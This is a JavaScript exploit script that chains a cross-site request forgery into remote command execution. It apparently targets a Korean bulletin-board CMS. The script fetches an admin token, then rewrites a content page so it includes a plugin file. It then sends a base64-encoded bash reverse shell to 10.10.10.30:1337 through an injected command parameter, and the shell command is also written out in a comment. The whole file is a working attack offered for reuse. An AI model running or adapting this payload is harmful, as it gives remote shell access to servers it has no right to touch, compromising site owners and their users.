/*
	CSRF -> RCE Script
  
*/

// Linux Server reverse shell -- Change it to your preferred option
// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' )
var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc=';
var ajax_token = '';
var co_id = 'community';

function stage3(){
	// Stage3 : Execute command
	cmd = encodeURIComponent(cmd);
	var xhr = new XMLHttpRequest();
	xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true);
	xhr.send(null);
}
function stage2(){
	// Stage2 : upload vulnerable script
	post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg=';
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function() {
	    if (xhr.readyState == XMLHttpRequest.DONE) {
		stage3();
	    }
	}
	xhr.open('POST', '../contentformupdate.php', true);
	xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	xhr.send(post_data);
}
function stage1(){
	// Stage1 : Get admin token
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function() {
	    if (xhr.readyState == XMLHttpRequest.DONE) {
	        ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0];
		stage2();
	    }
	}
	xhr.open('GET', '../ajax.token.php', true);
	xhr.send(null);
}

// Start from stage1
stage1();